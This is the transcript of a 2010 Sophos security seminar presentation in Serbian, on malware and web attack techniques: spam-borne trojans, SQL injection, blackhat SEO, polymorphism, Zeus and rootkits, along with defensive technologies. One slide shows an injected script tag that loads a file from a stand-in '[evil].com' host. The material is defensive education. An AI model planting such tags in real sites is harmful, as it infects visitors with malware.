Anatomija napada – duhovi u mašini

  • 865 views
Uploaded on

Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.

Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
865
On Slideshare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
16
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Vanja Svajcer
    Principal Researcher – Sophos
    Beograd, 13 Maj 2010
    Anatomijanapada – duhovi u mašini
  • 2. Šta radi SophosLabs?
    Sakuplja pretnje
    Analizira i klasifikuje
    Kreira detekcije i otklanja pretnje
    Objavljuje sveže definicije i informacije
    Istraživanje i razvoj
    Nešto više informacija videćemo kasnije
    2
  • 3. SophosLabsu samom centru
  • 4. Anatomija napada
    Postavljanje scenarija
    Zlonamerni softver (Malware)
    Tehnike napada
    Proces analize i alati
    Tehnologija zaštite
    4
  • 5. Tipovi malicioznog softvera
    Virus
    Trojanac
    Crv (Worm)
    5
  • 6. Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje
    Školarci
    Srednjoškolci
    Studenti
    IT profesionalci
    Uglavnom muškarci
    Nikako A/V kompanije
    Ko se nekada bavio pisanjem virusa?
  • 7.
  • 8.
  • 9. Virusi se retko viđaju, ali čini se da opet postaju popularni
    U pitanju je novac
    U osnovi se svodi na kriminal
    ( I dalje postoji tamo neki pegavi tinejdžer…)
    Ko piše malver danas?
  • 10. APT
    Advanced Persistent Threat
    Moderan izraz za “targeted malware”
    Mala veličina (oko 100k) i posebne namene
    Nema pakovanja
    Izgleda kao legitiman Windows fajl
    Neovlašćeni prikriveni transfer podataka (Data Exfiltration)
    Težak za uklanjanje
    10
  • 11. 11
    Email pretnje
    Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a
    2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem
    Iste stare taktike socijalnog inženjeringa
    UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.
  • 12. 12
    Top spemovani malver (2009)
    Dominiraju ključne familijemalvera
    Bredo
    Waled
    Jednostavnoali i dalje radi!
  • 13. Socijalni inženjering – Bredo
    Mal/Bredo
    Ista kampanja može obuhvatati brojne “različite” priloge
  • 14. Socijalni inženjering – Zbot (aka Zeus)
    Mal/Zbot
  • 15. BredovsZbot
    Konkurencija između botova!!!
    Bredopokušava da onemogući bilo koji instalirani Zbot
    Vrlo slično poput NetskyvsBaglerata od pre par godina!!!
  • 16. 16
    Email pretnje
    Globalnespem zamke za praćenje spema
    SADusmerava više spema nego bilo koja druga pojedinačna država
    Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade
  • 17. Web najdominantniji
    99% inficiranih sistema su legitimni kompromitovani sajtovi
    Sajtovi za napad
    Botnet C&C korišćenjem HTTP
    Napadi i dalje često počinju spemovanjem email-a
    17
  • 18. 18
  • 19. Napadi Web 2.0 aplikacija
  • 20. Korak1: preusmeravanje sa kompromitovanog sajta
    Kompromitovani web sajtovi
    Attacker-controlledredirects
    Attack site usingbundle of exploits
    Payload
  • 21. Kompromitovanje hostova
    21
  • 22. SQL injection
    DB
    DB
    DB
    Malicious SQLinjection
    Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection
    Šalju maliciozneHTTP zahteve (Demo)
  • 23. SQL injection
    <script src=http:/
    <script src=http:/
    <script src=http:/
    <script src=http:/
    <script src=http:/
    <script src=http:/
    <script src=http:/
    <script src=http://[evil].com/file.js
    SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima
    Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove
  • 24. SQL injection
    Korisnik se kreće web sajtom
    Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera
    Žrtva postaje inficirana malverom:Asproxtrojan
  • 25. 25
    Demo SQLi + XSS
  • 26. Novootkrivene inficirane stranice – april 2010
    26
  • 27. Blackhat SEO
    Kompromitovani hostovi zasejani sa SEO-kitovima
    Povećavaju rangiranje stranice
    27
  • 28. SEO trovanje
    Pretraga po popularnim rečima
  • 29. Blackhat SEO
    29
  • 30. Blackhat SEO
    30
  • 31. 31
    Demo Blackhat SEO
  • 32. Vidljivost – sajtovi koji hostuju SEO-kitove
  • 33. Korak3: Preuzimanje sadržaja sa napadačevog sajta
    Kompromitovani web sajtovi
    Preusmeravanja kojakontroliše napadač
    Sajt za napad koristi više kombinovanih ranjivosti
    Payload
  • 34. Web napadi
    Otkriven: 19. oktobra 2009.
    Izrađen korišćenjem kupljenih kompleta alata
    MPack, IcePack, GPack,Neosploit, Eleonore, Yes
    Konzola za upravljanje
    Phishing
    Najpogođenije države:
    Francuska – 4%
    SAD– 17%
    Velika Britanija – 3%
    Nemačka – 6%
  • 35. Web napadi
    Pregled po programimaza pregled Internet sadržaja!
    Polimorfizam sa serverske strane
    Procenat pogođenih:
    MSIE – 12%
    FireFox – 1%
    Opera – 5%
  • 36. Polimorfizam
    36
  • 37. Polimorfizam
    37
  • 38. Polimorfizam
    38
  • 39. Polimorfizam
    39
  • 40. Polimorfizam
    40
  • 41. Slabosti polimorfnog malvera
    Poly-engine je deo koda
    Može biti reverzovan od strane upornog istraživača
    Mora biti dekriptovan u memoriji
    Emulira programski kod dok se ne nađe prava varijanta
    Detekcija može biti bazirana po proceduri dekripcije
    41
  • 42. Polimorfizam sa serverske strane
    42
  • 43. Polimorfizam sa serverske strane
    43
  • 44. Polimorfizam sa serverske strane
    44
  • 45. Polimorfizam sa serverske strane
    45
  • 46. 46
    Demo SSP
  • 47. Korak4: Napadni žrtve kroz ranjivosti, zarazi ih
    Kompromitovani web sajtovi
    Preusmeravanja kojakontroliše napadač
    Sajt za napad koristiviše kombinovanih ranjivosti
    Tovar
  • 48. Lažni AV profesionalizam
  • 49. 49
    Video - scareware
  • 50. Troj/MacSwp
    50

  • 51. Zeus (Zbot)
    Komplet za kreiranje botneta i malvera za krađu informacija
    Builder
    Loader
    Control panel
    51
  • 52. 52
    Demo Zbot
  • 53. Zeus (Zbot) - tracker
    53
  • 54. 54
    Rootkitovi
    Programi koji koriste različite tehnike da sakriju svoje prisustvo na računaru
    Trojanci
    Legitimni programi?
  • 55. Šta Rootkitovi rade?
    Listanjefajlova
    Memo.doc
    Memo.doc
    Sales.xls
    Sales.xls
    Phish.exe
    Sophos.ppt
    Listanjefajlova
    Anti-Virus
    skener
    Rootkit
    Operativni
    sistem
    Phish.exe
    Sophos.ppt
  • 56. 56
    Demo rootkit
  • 57. 57
    Vrhunski rootkitovi
    TDSS (TDL3)
    MS10-015 update
  • 58. Vrhunski rootkitovi– Sinowal (Mebroot)
    InficiraMBR (poput starih boot sektor virusa)
    ModifikujeOS loader da učita maliciozni drajver
    Drajver sakriva maliciozniMBR (stealth)
    Instalira prilagođenimrežni stek
    Sadržibackdoor (enkriptovanaHTTP komunikacija)
    Tovar– ubrizgava maliciozne DLL-ove
    Pseudo-nasumično generisanje URL-ova zaupdate (dnevni)
  • 59. Rootkitovi– Sinowal (Mebroot)
    CPU Real mode
    CPU Protected mode
    BIOS
    initialization
    MBR
    Boot loader
    Early kernel
    initialization
    Kernel
    initialization
    MBR
    Boot loader
    Early kernel
    initialization
    User process
    Endpoint
    security
    User process
    Sinowal
    dropper
    User process
    Read
    MBR
    BIOS services
    Window services
    Window services
    Hard disk
  • 60. Sinowal geografsko širenje(Sinowal, Feb-Mar 2010)
  • 61. 61
    Vrhunski rootkitovi budućnosti
    Rootkitovi za virtualizaciju
    Softver(Subvirt)
    Uz pomoć hardvera (Bluepill, Vitriol)
    Bootkitovi (eEye, vBootkit, Stoned)
    SMM bazirani rootkitovi
    Bios/EFI bazirani rootkitovi?
  • 62. Rootkitovi za virtualizaciju
    Aplikacija 1
    OSg1
    OSg2
    Aplikacija 2
    VMM
    Rootkit za virtualizaciju
    OS
    Hardver
  • 63. Rootkitovi za virtualizaciju
    OSg3
    OSg2
    OSg1
    Domen 0
    Hardver
    Rootkit za virtualizaciju – maliciozni hipervizor
  • 64. SophosLabs™
  • 65. Pregled
    65
    50000
  • 66. SophosLabssistemi
  • 67. 67
    Demo lab sistemi
  • 68. Tehnologija zaštite
    Inspekcija sadržaja (klasično skeniranje)
    Detekcija na bazi ponašanja (HIPS)
    Reputacija
    Domen
    Fajl
    68
  • 69. Životni ciklus familije malvera
    Prvi član porodice
    Analiza
    Detekcija
    TEST
    Objava
    Sledeći član porodica
  • 70. Karakteristike familije
    Identične osnovne funkcionalnosti
    Nove varijante mogu imati dodatne funkcionalnosti
    Linije koda se ponovo upotrebljavaju
    Nakon rekompilacije, nova varijanta je binarno različita
    Tradicionalno skeniranje nije efikasno za proaktivnu detekciju familije
    Zahteva analizu na funkcionalnom nivou
  • 71. Grafički prikaz aplikativnih zahteva
  • 72. Spakovan -> Raspakovan
  • 73. „Runtime behavioral“zaštita
    Nadopunjuje Behavioral Genotype
    Proverava ponašanje procesa primenjenona sistemu
    Proverava sve pokrenute procese na znake malicioznih modifikacija sistemskih objekata
    Fajlove
    Registry unose
    Procese
    Mrežne konekcije
    Učitane drajvere
  • 74. Registracija urun ključu
    • Pokreće se proces virus.exe...
    • 75. Hmmm, OK.Skeniram na viruse…
    • 76. Ništa nije pronađeno.
    • 77. Virus.exe otvararegistry run ključ...
    • 78. Zanimljivo. Reci mi nešto više o tome.
    • 79. Virus.exe se registruje u run ključ…
    • 80. Hmmm, ne, to nije OK.Blokiraj operaciju!!!
    • 81. Operacija blokirana.
    • 82. Hvala ti kernele!
    • 83. Izveštavam o ponašanju.
    Uprošćena runtime arhitektura
    Privileged – kernel mode
    Non-privileged – user mode
    Virus.exe
  • 84. Buffer overflow zaštita
    Generičkatehnologijaza detekciju zloupotrebe propusta (uključujući tzv. zero day zloupotrebe)
    Nadopunjuje Windows DEP
    Detektuje različite buffer overflow napade
    Stack
    Heap
    Return to lib C
    Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske strane
  • 85. Buffer overflow – uprošćena arhitektura
    • Preuzimam fajl…
    • 86. Zanimljivo, odakle dolaziš?
    • 87. Internet Explorer programski kod.
    • 88. OK.
    • 89. Preuzimam fajl2...
    • 90. Oh, ne opet.Odakle dolaziš?
    • 91. Stack.
    • 92. Oh, ne. Buffer overflow detektovan!!!
    • 93. Suspendujem proces.
    • 94. Prijavljujem ponašanje.
    Iexplore.exe
  • 95. Cloud computing
    77
  • 96. Cloud zaštita
    Pretrage u realnom vremenu
    Povratne informacije u realnom vremenu (zaštita zajednice)
    Socijalno umrežavanje vezano za bezbednost
    Premošćavanje prekida u zaštiti
    Unapređenje vremena odziva
    78
  • 97. Proaktivno vs reaktivno
    79
  • 98. Zaključak
    Malver postaje sve kompleksniji
    Finansijska motivacija
    Usmereni (targeted) malver može predstavljati izazov
    Security zajednica ne gubi bitku
    Stalno se razvijaju nove metode
    Tehnologija ne predstavlja „srebrni metak“
    80
  • 99. vanja.svajcer@sophos.com
    Blog: http://www.sophos.com/blogs/sophoslabs
    Twitter: http://twitter.com/sophoslabs
    Pitanja?